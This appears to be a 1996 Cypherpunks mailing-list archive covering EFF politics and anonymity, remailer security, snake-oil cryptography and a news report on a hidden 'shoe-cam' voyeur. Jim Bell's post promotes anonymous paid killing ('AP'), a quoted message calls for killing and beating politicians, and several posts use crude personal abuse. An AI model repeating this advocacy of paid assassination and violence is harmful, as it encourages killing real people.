>  DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
>  JFA Technologies, R&D consultants: physicists, technologists and engineers.
> 
>  PGP keys at: http://w3.citenet.net/users/jf_avon
>  ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
>  
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Thu, 5 Sep 1996 07:46:33 +0800
To: cypherpunks@toad.com
Subject: Internet blamed in shoe-cam crimes, assailant free on $750 bail
Message-ID: <v01510115ae53a68f5a40@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain



Toronto Sun, 04sep96

Sneaky photographer charged ...

by Tom Godfrey

A retired high school shop teacher has been charged after
a man allegedly used a camera hidden in his size 12 shoe
to secretly videotape up the skirts of young women at the CNE.

Det. Mike Beauparlant said a man photographed up to 20 women
with his "shoe cam," which contained about seven hours of footage
when he was arrested at the CNE last Saturday night.

Beauparlant said investigators believe he got the idea from surfing
a voyeur news group on the Internet.

He ordered a $400 fibre optic lens and fastened it in a brogue shoe,
police allege.

The Oxford-style footwear contained a false front and two small screws
on the sole to which a bracket and lens were affixed.

"I've never seen anything like this in my 21 years on the force,"
Beauparlant said.  "This was ingenious."

Beauparlant said the body of the camera was hidden in a waist pouch
and connected to the lens on the shoe with wires that ran under a
man's pants and through his sock.

"He always photographed very attractive women in their 20s with short
skirts," added Det. Const. Mike Dicosola.

He said the man was detected by two couples who noticed him moving his
foot under the skirt of a woman.  They followed the man, held him and
called police.

Police ask women who feel they've been victimized to call 808-5289.

George Walter Campbell, 62, of Cornwall, has been charged with sexual
assault and mischief.  He returns to College Park court on Sept. 10.
He was released on $750 cash bail yesterday.

-30-






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 5 Sep 1996 08:17:03 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609031730.KAA20063@netcom2.netcom.com>
Message-ID: <Pine.SUN.3.94.960904160701.1787A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



[This will be my last comment on this thread.]

On Tue, 3 Sep 1996, Vladimir Z. Nuri wrote:

> 
> >I would put forth that you know nothing of my efforts, and therefore are
> >in no position to judge me.  I would also put forth that the efforts of
> >EFF, or lack thereof, are quite public.
> 
> that's my point. an entity that is willing to put its
> reputation on the line is inherently more valuable than one that
> is not, imho. all the EFF members have good public track records.
> what EFF has accomplished is checkered, like any battle-scarred
> infrantry will experience. if you expect unadulterated success,
> you're not living in the same reality everyone else around here
> is.

If you're going to ask me for money and support, you damn well better
produce unadulterated success.

> granted, EFF has made some serious compromises in their agenda.
> they're finding their identity. but it doesn't help to have people
> rant at them and ignore their notable successes, and tend to criticize
> them merely because they're a public target.

Awww, poor EFF.  It just needs a little love and attention.
It's trying to be the best compromising entity it can be.  It's not fair
to criticize it.  We don't want to frighten it or anything, it might be
stunted for life.

> whenever you criticize something, please keep in mind the basic
> qualification: what is a better alternative?

Sometimes nothing at all can be a better alternative.

> sure, EFF hasn't had
> stellar success, but then, who has in the agenda they are pursuing?
> their goals are extremely ambitious and difficult in the current
> climate. lack of success is proof of the difficulty, not of any

Again, I'm sure every violin in the place is playing for EFF and it the
powerful traumas it has to endure.  What do you think this is?  The
olympics?  I don't CARE how hard the job is.  You don't get things done by
being sympathetic in politics.  Maybe, Lance, that's how it works in
Colorado, but not in D.C.  Take the hearts and flowers crap elsewhere.  IF
they are asking for money I don't think that excuses are a luxury they can
indulge in.

> when you begin to understand this, you
> won't alienate those you are critical of. EFF members are *tremendously*
> open to positive comments. instead you harangue them and lose their
> good will to the point that they may tend to ignore cpunk comments
> entirely because of your very poor example.

If EFF is so sensitive that my comments will cause them to close their
ears to their potentially most interested constituancy, well, EFF is an
organization that needs to die and be replaced.

> >I think any organization that would apply political pressure rather than
> >bow to it would be an alternative.  I think an organization in touch
> >enough with its own policy to prevent its staff and board from making
> >embarassing big brother type proposals to curtail the ability of any of us
> >to post without attributation would be an alternative.  I think an
> >organization without the internal conflict and strife that has clearly
> >marred EFF in past and made it a laughable attempt at cohesive political
> >persuasion would be an alternative.  I think an organization that had
> >official policies on the core issues which it proposes to influence would
> >be an alternative.
> 
> why don't you start one then?

As I said before, you know nothing of what I am doing.  I don't buy the
"well then you do it" crap.  They are taking other people's money.  Do it
right because that is their JOB.  I don't have time to play about with
net politics in D.C. right now.  Nor, frankly, do I think my resources in
that area would do much good.  Maybe EFF can't do the job, which is the
position you seem to be taking, then maybe no one can and resources should
be allocated elsewhere.  Just don't come whining to me about how life is
so hard on EFF.  Deal.

 what you seem to fail to adequately
> understand is that there is virtually no organization in the world
> that is free from the difficulties you describe. whenever you have
> multiple people working together, you aren't going to have clear-cut
> successes. cpunks are always yelling at anything resembling organization,
> which really annoys me. EFF has had tremendous powerful successes in
> areas you are conveniently overlooking, in areas that are hard
> to measure, such as increasing public awareness. can you make a good
> case that EFF has had no positive effect? we may be living in a much
> darker reality without them.

Yadda Yadda Yadda and life is so hard isn't it a shame?

> >In short, an organization that had even one of the needed elements of
> >legislative influence.  (Cohesive, directed, persistent, and
> >uncompromising).
> 
> our congress does not have this property after centuries of trying.

You confuse legislation with legislative influence.  Advocacy with
concensus building.

> > What is so shocking about announcing that a
> >given organization does not support my interests and therefore calling on
> >others who share my interests not to make financial donations to said
> >organization? 
> 
> you can criticize an organization without implying the people who contribute
> to it are incompetent, a distinction that has subtly eluded you so far.

I can, but I happen to believe that they are.  Look at the slips.  A
political action organization cannot afford to have their primary members
spouting off like that.  It kills the organization.  It has, in my view.

Perhaps EFF has an important function.  Lobbying is not it.

> > Is there something EFF fears in free speech and political
> >consensus building?  Perhaps if they had a straightforward policy....
> 
> no matter what they decide, they will be flamed by someone such as
> yourself. they do have an agenda.

What's their anonymous poster agenda then?

> >Phrased another way, who cares what you are tired of hearing?
> 
> the EFF ranting is periodic, and your own sour comments are 
> a repeated feature of this list. who *are* you? why are you so
> critical of everything in existence? based on previous rants,
> you're a habitual sourpuss.

When people are asking for money and promising results, I expect results.
If this makes me a sourpuss, fine, I'm a sourpuss.  As for who I am,
it is and shall be none of your business.  I understand that there is a
dtendency here to get flaky and passive.  "So what, they are trying."
Hey, life is hard.  Sometimes people aren't up to the task.  Fine, admit
it rather than dragging it on for years and move on.

If EFF ranting is periodic perhaps EFF should take a hint?

> >No, but when an organization espouses nothing on a given subject key to
> >its mission, what does that say?  What about when its members espouse
> >entirely different and even counter productive beliefs
> 
> again, you are presuming that anonymity is key to their mission.
> that's a big leap of faith. there is room for honest disagreement.
> you haven't heard of their agenda personally, so you are assuming 
> there is none. from what I have seen, there is a reasonably 
> cohesive agenda going on, and I'm not, like yourself, assuming
> that it doesn't exist merely because I haven't seen it blared in
> a noisy advertisement somewhere.
> 
> I agree with some of the EFF member's comments: anonymity could
> be a very serious quagmire to support. there are probably better
> trees to bark up.

Anonymity is currently the status quo.  Tell me, what exactly, if someone
takes the position that it is too hard to support, are they going to do
to, for example, prevent what I'm doing?

Will you be required to register with your ISP?  Provide credit references
to be permitted on the net?  Use a smart card with fingerprint checking to
log on?

Anonymity is the key.  Period.  Your failure to see this simply destroys
your argument.  Look Lance, just because you have not been able to keep
from being outted doesn't mean that some others don't benefit from
Anonymity.

> EFF has lobbied against many of the bills you mention. again, I think
> you're being unfair in assuming merely because you haven't heard
> of them accomplishing anything, they haven't.

If I haven't heard of EFF's accomplishments then they aren't doing their
job.

> >I do infact feel the cpunks have a greater track record than EFF.  Tell
> >me, what has EFF done?  The list of "cypherpunk" accomplishments in terms
> >of making the net a better place to be is, in my view, significant.
> >Certainly the discussion here is livelier than anything I've seen from
> >EFF.
> 
> ah, the fundamental illusion that is going on here. discussion alone
> is WORTHLESS in changing the world. yet we have REAMS of it on the
> cpunk list. I'd say EFF has *acted* and put enormous effort into
> its agenda.

So trying hard is the measure of success?

"But he was trying SO hard to get the gold medal, let's just give it to
him."

Bah.

> but it is invisible because its not easily quantified.
> ask them how many pamphlets they have printed for the public, how
> much mail they have sent out to members informing them of
> developments, etc.  consider the high-quality EFF newsletter. 

Wait, wait.  Wasn't it you who just said "ah, the fundamental illusion
that is going on here. discussion alone is WORTHLESS in changing the
world."  How are pamphlets any different?

> is there anything like that in the cpunk area? frankly I think your
> comparing cpunks to EFF is really laughable.

I take that almost as a compliment.

> they are not even in the same ballpark.

Oh, I agree.

> >Well what, EFF, have you done for us LATELY?
> 
> EFF hasn't done much for anyone who hasn't paid their dues..

So keep paying Lance.  At least you're getting some satisfaction out of
it.

> 
> >English is not my first language.  Start paying my hourly rate to type in
> >the thousands of words and dozens of legal summaries I send to this list
> >every month and I will begin to proof read carefully.
> 
> your legal summaries are impressive. your rabid criticisms leave
> a sour taste in my mouth. measured criticism, I can deal with.

If it's too hot...

> >> and you, like many other cypherpunks and cyberspace weasels, 
> >> have a whine-and-shriek-from-the-shadows bent.
> >
> >And your point is?
> >
> >You'd like the shadows lifted?  Speaking without a true name attached is
> >somehow evil?
> 
> really, an opinion without attribution is not worth as much as
> one with it. there's no escaping this simple concept. I agree that
> a pseudonym can gain a reputation, but yours has very little
> associated with it to qualify criticism of EFF imho. so you have
> posted regularly to the cpunk list. big deal.

By your logic you're not in much of a position to commend EFF or
criticise me for that matter then, "Vlad."

> >This is EFF talking.  "The situation is hopeless, bail now to preserve
> >image."
> 
> EFF has changed its direction from working in washington.

Exactly.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stanton McCandlish <mech@eff.org>
Date: Thu, 5 Sep 1996 12:37:46 +0800
To: aba@dcs.ex.ac.uk (Adam Back)
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609042000.VAA00708@server.test.net>
Message-ID: <199609042341.QAA14459@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Adam Back typed:
> 
> 
> Stanton McCandlish <mech@eff.org> writes on cpunks:
> > [again, since I'm not on the CP list these days, feel free to bounce this 
> > over to the list if it doesn't make it. I'm not sure what the 
> > non-subscriber posting policy is and/or whether such attempted posts are 
> > filtered out, though I seem to recall they didn't used to be.]
> 
> Cypherpunks always has been and remains an open list.  You shouldn't
> need to wonder given cypherpunk views on free speech :-)

I grok. Hadn't been on the list for a while, and a lot of lists have set 
up non-subscriber filters to block spam these days.

I appologize to CP readers, who rightfully question my Ccing the list 
when I'm not on it (lately, anyway).  I'm just responding to where the 
message I'm responding to has been.  So far no one's seem particularly 
upset at this, just irritated, so it seems prudent to continue doing so, 
unless/until this gets to be a pointless thread.
 
> > In other words you propose an alternate EFF that censors its own
> > boardmembers.
> 
> No.  But I too am rather suprised to hear an EFF board member
> apparently speaking against free speech.  OK, so maybe she was
> mis-quoted so I wait for her rebuttal, but nope, she basically to my
> reading reiterates nothing but negative opinions on free speech and
> anonymity.
>
> Tim's quotes of her CFP speech further demonstrates her leanings.

I've talked to her personally about this.  She's not thinking along those 
lines, she just perceives a potential problem in the 
accountability/ethics area, and is wondering how that can be solved, if 
it can be solved, and what the price of such a solution is.  Honest, 
she's not *advocating* restrictions on anonymity, just asking if any are 
necessary, in who's opinion, with what rationale, at what cost, and by 
what mechanism.

Another CP reader I've been talking to suggests even asking such a 
question is dangerous because it puts ideas in the minds of anti-freedom 
legislators.  I tend to disagree on this, since such people already see 
anonymity as a problem. They come from a world in which every citizen 
minus a few "weirdos" has an ID card, who's check and credit 
transactions are traceable, who's money is marked and numbered, whos 
medical and other records are readily available. And their campaigns are 
funded by companies with a vested interest in identification (credit 
bureaus, banks, insurance companies, etc.) The *already have* the idea.   
But, that may be neither here nor there.

I would agree when it comes to things that legislators have not even 
thought about yet. In cases like that, better to work quietly with 
activists, with industry, etc., to deal with it behind the scenes so it 
never even appears on congressional or regulatory radars.
 
> Lets put it this way: if Louis Freeh offered to be an EFF board
> member, would you take him on board?  If he seemed quite

Highly unlikely.  Who gets to be a boardmember is decided by a board vote.
Freeh's anti-freedom history, and his obnoxious nature would, in my 
guesstimate, give him less that a .0000000000001% chance of ever making 
it onto the EFF board. And that's being nice. :)

Dyson has no such history, and does have a history of careful thought 
(even if disagreed with by quite a few people) about networks, online 
commerce, negative effects of regulation, and civil liberties issues.
More the former 3 than the latter 1.  Not everyone on the board is there 
because of strong work directly in liberty areas, but often for other 
stuff, as long as they seem consistent with the civil liberties issues. 
Otherwise we might as well just have one boardmember. The diversity is 
necessary, as long as it doesn't get divisive.  It has gotten divisive in 
the past, and there are some boardmembers who are not on the board any 
more as a result (none that I know of were "canned", they just understood 
it wasn't working and moved on.)

 > pro-anonymity, and free speech, and later turned out to be having 
> doubts, would you keep him?

I'll generalize that to "if you had any boardmember who expressed doubts 
about the value of free speech and privacy, would the board keep them?"
I think not. But Esther's taken no such position. She's asking questions 
about the mechanics of a system, and the effects of the system on society.  
These are valid questions.  It'd be helpful to see some short 
Cypherpunks-generated answers, if they are available.  Stuff about 
reputational systems, etc.  I know this stuff in a vague way from reading 
CP for years, but I don't have or know of any specific documents on the 
topic.  Something like that to pass around internally here would be of 
value in helping EFF settle remaining issue, adopt a policy position, and 
get on with it.

> Ie if her views are proving a liability for EFFs reputation, perhaps
> you all ought to get together and see if you can work something out?

That is unlikely to ever be a concern.  If any boardmember's views 
proved a liability for EFF mission and work toward that mission, that's 
when the board would considering asking for a resignation, or kicking 
someone off the board directly.  We're mindful of PR and image, but the 
mission comes first. 
 
> Anonymity is a pretty darn major issue here, so it'd be really sad to
> see EFF coming down on the wrong side.  I've seen some of the other

That will never happen.  EFF would tear itself apart in a matter of hours 
if that happened.  The worst that will happen is that EFF won't adopt a 
policy on this issue. I tend to doubt that will happen either. As I was 
telling BU, I think we're closer now than ever before to having an 
anonymity policy.  That's mainly why I'm asking for pointers to any 
superb documentation on the topic. It's genuinely needed to resolve a few 
remaining issues.

Just to be clear: There is no disagreement on the board, or the staff, of 
EFF that anonymity is a vital component of privacy. If that's what the 
worry is, lay it to rest!  Actually coming up with a statement on the issue 
is something that's taking a bit longer due to some concerns and 
questions that haven't been assessed yet (by the boardmembers with these 
questions & concerns).

> She sounded pretty anti-anonymity to me.

I think that's your inferrence, not her implication. :)  I've talked to 
her personally about this, and that's not what she's saying.
 
> Are there a shortage of political and net-aware libertarians for board
> candidates or something?

There's no shortage of candidates in general, but finding ones that add 
something useful to the mix, get along with everyone, work cooperatively, 
are not interested in being a board member to add a line to their vitae 
or for other purely personal reasons, who have enough time and resources 
to do this, are willing to do fundraising, etc., etc., is somewhat more 
difficult. (I answer the question since it was asked. I refute, from a 
personal level, the implication that Esther's not fit to be on the EFF board.
She's been here almost from the very start, and EFF would not be here 
right now at all if not for her.)

> Perhaps the quote was unfortunate, perhaps she has also said
> pro-anonymity things.  But a person who is pro-anonymity would surely
> try to emphasise the pro arguments also?  The material I have seen so
> far does not seem to indicate that this is the case.

<shrug>  This long after the fact I have no way of knowing what she 
said verbatim, in what order, with what stress, etc.  Having been 
interviewed a lot of times, and seen a mangled result, I know that 
interviewers often take liberties with the ordering of statements, and 
remove material, and juxtapose one statment with other stuff it was not 
referring to originally, etc.  Any of that could have happened. If it was 
an oral interview, which is likely, keep in mind that many people don't 
speak well off the tops of their heads.  I can't believe some of the 
things *I*'ve said in situations like this. They just didn't come out right.
Interviewers often get attribution incorrect too, as in this case.

I think this is a mountain out of a mole hill problem.  Like I say, if 
EFF comes out with a policy against anonymity, THEN get out the rope.
It just won't happen.  
 
> If this is the case she needs to be _much_ more careful about what she
> says in `personal' interviews.

Certainly. All of us do. I know I do.  I still remember the time I 
slammed the FCC for being "the largest censorship body in the western 
world", at a time during which EFF was trying to get them to back off 
from deciding to push for regulatory authority (which, as we've seen, 
Congress is only too willing to grant).  Needless to say, they would have 
been less willing to listen to EFF after that, had they seen the comment
(probably didn't, it was in a small local newspaper; had a lot of 
dangerous potential though.)

> Be sure to express the pro-anonymity arguments while you're zealously
> hammering out every last thing that can go wrong with anonymity: like
> that free speech is not possible with out it.  It's pretty much all or
> nothing, either you think free speech is worth the risk, or you prefer
> big brother, government access to keys, the works.

Agreed. I'm sure the board agrees too.  We just like, and need, to have 
answers to the immediate authoritarian attack that will come on what EFF 
says, before we say it.  The saying about being silent and being thought 
a fool, vs. speaking up and removing all doubt applies here in an 
interesting way. If we have unprepared arguments, opponents will make us 
look like fools. It's only a secondary concern that this hurts EFF's 
image. The real problem is that things like that undermine the 
credibility of the whole "cyberliberty" camp.
 
> [see http://www.c2.org/~winsock/ for a windows remailer]

Any e.t.a. on a Mac one?  Sometimes I wish I could write code worth an 
exon so I could help move this along. Like I have any time to do 
programming anyway... <sigh>


--
<HTML><A HREF="http://www.eff.org/~mech/">    Stanton McCandlish
</A><HR><A HREF="mailto:mech@eff.org">        mech@eff.org
</A><P><A HREF="http://www.eff.org/">         Electronic Frontier Foundation
</A><P>        Online Activist    </HTML>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 5 Sep 1996 10:49:00 +0800
To: dnowch2@teleport.com
Subject: Browne and foreign tyrants
Message-ID: <199609042343.QAA25061@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>From: "George D. Phillies" <phillies@WPI.EDU>
>Subject: Re: Browne & foreign tyrants
>There is a section of the Geneva Protocols forbidding actions in occupied
>territories directed against officers of political parties.  Under that
>section, the actions in Somalia against, e.g., the treasurer of General
>Aidid's political party, were war crimes.  No one seems to get very upset.
>
>> If there is such a treaty, the US has a long history of ignoring it.
>> 
>> 0) Attempts to kill Hitler.
>I don't think we ever tried this.

And this was a real shame.  Over 30 million people died in WWII, directly or 
indirectly.  We knew that Hitler was going to be a problem well before 1936. 
 Think how many could have been saved...

If anything, WWII is excellent proof that AP is a good idea.  Stauffenberg 
was the German who bombed Hitler's meeting in 1944 but failed to kill him.  
Stauffenberg knew as early as 1942 that Hitler needed to be killed, and a 
recent "60 Minutes" episode related how hundreds of people knew about this 
plot.

The reason he failed was that while he was preparing the two bombs in a 
bathroom, he was interrupted. (The bomb's delay mechamism was acid 
dissolving a metal.)  Rather than being caught, he left one of the 
briefcases in the bathroom and went to the meeting with only one bomb.  
Furthermore, he left the bomb at the meeting, but it was pushed behind the 
heavy table after he left, which shielded Hitler from much of the force of 
the explosion.

If AP (or at least, some anonymous reward mechanism for Stauffenberg's 
family) had been available, he would have done "the honorable thing," and 
walked up to Hitler with the bomb and instantly detonated it right there, 
resulting in both Hitler's and Stauffenberg's certain death.  At least 
hundreds of thousands or perhaps over a million people would have SURVIVED.  
As it happened, Stauffenberg's reticence caused not only his death after 
torture, but also the deaths of well over a hundred coup-plotters, but also 
the thousands that were yet to die in the last 6+ months of WWII.

Question:  Would you kill yourself to save a million lives?  Even if you 
wouldn't, would you change your mind if your heirs would be anonymously paid 
an extra $10 million dollars or so?  I'd say that's a pretty substantial 
motivation, wouldn't you?



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 5 Sep 1996 12:15:57 +0800
To: cypherpunks@toad.com
Subject: Secure remailers, was Race Bit: C
Message-ID: <v02130501ae5366709035@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>At 04 Sep 1996 15:21:54 -0800, jim bell wrote:
>Perhaps the most ominous part of making "use of encryption to thwart an
>investigation" illegal is _not_ that remailer operators might be prosecuted,
>but that they might NOT be prosecuted in a deal where (in exchange for not
>being prosecuted) they continue to operate the remailer, "cracked" or
>sabotaged so that they share all the info with the cops.  While even that
>won't make chained remailers totally useless, eventually suspicions of such
>a crack will surface, which will help sabotage the credibility of all
>remailers,
>not just the ones that have been "stung."
>

Yes, that is why there needs to be a move to place all 'critical' portions
of remailers and other important servers inside trusted hardware which is
highly resistant to compromise.  All access to sensitive information (e.g.,
keys) inside these modules should require multiple parties in several
countries (not just the operator of the server) to cooperate.  Properly
structured (such controls could effectively thwart law enforcement
compromise.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ       | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 5 Sep 1996 12:38:30 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609041702.KAA15781@mail.pacifier.com>
Message-ID: <Pine.SUN.3.91.960904161112.27739N-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Sep 1996, jim bell wrote:
> Why WOULDN'T the police want to shut down anonymous remailers?  The Leahy 
> bill clearly didn't distinguish between remailer operators and users, so it 
> is no leap to conclude that they would be treated similarly.

Why *wouldn't* the police want to shut 'em down? Because the police
respect the Constitution and our civil liberties, of course, and realize
and respect the value of anonymous political speech. 

-Declan


// declan@eff.org // I do not represent the EFF // declan@well.com //





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 5 Sep 1996 12:30:15 +0800
To: Declan McCullagh <declan@eff.org>
Subject: Re: Letter to the Observer [re: Internet paedophile]
Message-ID: <9609042255.AA24605@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  4 Sep 96 at 14:44, Declan McCullagh wrote:

> Jean-Francois, your comments are inspired!
> 
> As a member of "such media" in that I still publish articles on dead
> trees -- I have articles in fall issues of Wired and Playboy, for
> instance -- I rejoice in your reasoned suggestion that you deny me
> and my ilk access to the Net.
> 
> But wait! I connect through wired.com, eff.org, or *.edu accounts.
> How do you plan to kick me off my "ISPs?"
> 
> No, you're not out to lunch.

Well, I did not expect nor want to bar all of the ink spreader
community, only, by giving some individual or some rags some
trouble, they might get the message.  

*I* don't plan to kick any net-smearer scumbag off his ISP, I
suggest/-ask if- ISP themselves would have advantage to do that./?

I simply don't pretend to know it all, so I ask questions...

jfa
Jean-Francois Avon 
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Sep 1996 03:26:00 +0800
To: cypherpunks@toad.com
Subject: SNAKEOIL ALLERT: FUCKHEAD ;-)
Message-ID: <841932737.22584.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> SK> I am currently not releasing the source code.Here is a copy of the zip 
> SK> file if you get hold of a pc.

Aghhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh.

Last week is was " The Knapsack TM " with a "proprietary algorithm" 
now it`s Secureit for windows!

It`s a veritable flood of snakeoil..... lets start a drunroll: 
fuckhead


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Sep 1996 03:35:47 +0800
To: cypherpunks@toad.com
Subject: Re: Pseudocrypto detector is going wild
Message-ID: <841932730.22539.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Is it just me, or is the snake-oil frequency factor scaling up?
> We used to get this stuff quarterly, and now it's monthly, if
> not weekly!
> 
> slither-squeek

Yeah,

I too have noticed this.

Hey kids, heres uncle Pauls Snake oil test. if the post contains any 
of the following it is slither-squeek material:

1. The word "Proprietary"
2. References to a new algorithm, which hasn`t been seen yet and is 
"the strongest ever"
3. people who use TM after their alogorithm, this is Snakeoil(TM)(R)
4. People who think cryptographers seeing their algorithm will make 
it less secure
5. People who have never coded a crypto tool in their life then 
instead of working on current algorithm implementations re-invent the 
wheel because they don`t understand how to implement current ciphers.


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Sep 1996 03:53:32 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <841932742.22613.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> > The gubment has no right to fuck with any speech - (seditius) libel, child
> > porn, bomb-making instructions...
> > 
> Agreed. Otherwise, by a slipery slope argument, they can eventually
> supress any form of speech whatsoever.

true enough, most punks on here are a bit less radical but we need 
more of this sort of absolutism


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Sep 1996 17:39:22 +0800
To: cypherpunks@toad.com
Subject: Re: their is a new mailing list
Message-ID: <841932721.22517.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Some crazy fucker wrote:

> > their is a new mailing list for all you hackers just email your name or
> > handle and e-mail address and youll be subscribed
> > send information to hack5@juno.com

Listen motherfucker.
I`m going to say this once and for all... this list is not about 
hacking, not about "me too" messages, it is about cryptography, the 
tecnical and ethical sides. if you want to post shit like this do it 
on alt.2600 and let me tell you they will flame you for it there too, 
and quite rightly, I think I speak for us all when I say RTFM.


  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4=
=riHc
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Fri, 6 Sep 1996 17:57:44 +0800
To: cypherpunks@toad.com
Subject: Re: Voting Monarchist?
Message-ID: <841932727.22534.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> ! Harry Brone is a fucking statist.  If he weren't, he wouldn't be running
> ! for president.  Anyone who doesn't advocate killing all kings, presidents,
> ! and prime ministers is a fucking statist and should be beaten to a pulp
> ! with a rattan stick.

Yeah,

and anyone who dosen`t advocate random street searches, public 
floggings and  legislation to make the eating of asparagus for 
breakfast law is a raving leftist militant cyberterrorist neon 
lighting, macdonalds working, fudge packing, bad ass dude with an 
attitude...

have a nice day motherfucker

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
